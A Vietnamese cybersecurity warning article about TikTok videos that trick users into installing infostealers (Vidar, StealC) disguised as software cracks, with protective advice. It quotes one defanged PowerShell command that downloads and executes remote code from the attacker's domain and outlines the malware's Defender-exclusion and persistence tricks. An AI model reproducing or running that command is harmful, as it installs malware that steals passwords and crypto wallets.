 |
Cẩn trọng mất dữ liệu khi cài đặt các phần mềm crack qua TikTok |
Tin tặc sử dụng video AI giọng nói, không lộ mặt, hướng dẫn "crack" các phần mềm phổ biến như Windows, Office, CapCut, Spotify... Các video này có thể đạt hàng trăm nghìn lượt xem, hàng chục nghìn lượt thích – tạo cảm giác “uy tín”.
Khi người dùng làm theo và dán dòng lệnh PowerShell như: iex (irm hxxps://allaivo[.]me/spotify), máy sẽ tự động tải về mã độc Vidar hoặc StealC – chuyên đánh cắp mật khẩu, thông tin tài khoản, ví tiền điện tử..
Các chuyên gia an ninh mạng đã từng phát hiện ra nhiều video độc hại đã có gần 500.000 lượt xem, 20.000 lượt thích, share... cho thấy mức độ lan truyền cực lớn.
Tuy vậy, các mã độc này lại rất khó phát hiện do chúng tự tạo thư mục ẩn và thêm vào danh sách ngoại lệ của Windows Defender; Cài thêm lệnh để tự khởi động cùng Windows mỗi lần bật máy; Giấu địa chỉ máy chủ điều khiển qua các nền tảng hợp pháp như Telegram và Steam, khiến việc phát hiện và xóa bỏ càng khó hơn.
Các tài khoản TikTok liên quan như: @gitallowed, @zane.houghton, @allaivo2... đã bị xóa, nhưng có thể còn nhiều tài khoản tương tự đang hoạt động.
Để tránh lộ lọt dữ liệu cá nhân, các chuyên gia an ninh mạng khuyến cáo người dùng cân nhắc trước khi làm theo bất kỳ video nào hướng dẫn/ review trên TikTok (nhất là yêu cầu chạy lệnh lạ, PowerShell,...); Xác thực nội dung thông tin trong video (không biết thì đừng mù quáng làm theo, về kỹ thuật cần hỏi người có chuyên môn hoặc các cộng đồng chuyên).
Đồng thời, không cài phần mềm crack, kích hoạt lậu – nguy cơ bị đánh cắp toàn bộ dữ liệu cá nhân, mật khẩu, tài khoản ngân hàng,thay vào đó, hãy cài phần mềm từ nguồn chính thống và luôn bật Windows Defender.
Những người có chuyên môn nếu phát hiện tài khoản/video nghi ngờ, hãy report ngay cho nền tảng và cảnh báo tới những người xung quanh mình hoặc cộng đồng được biết.
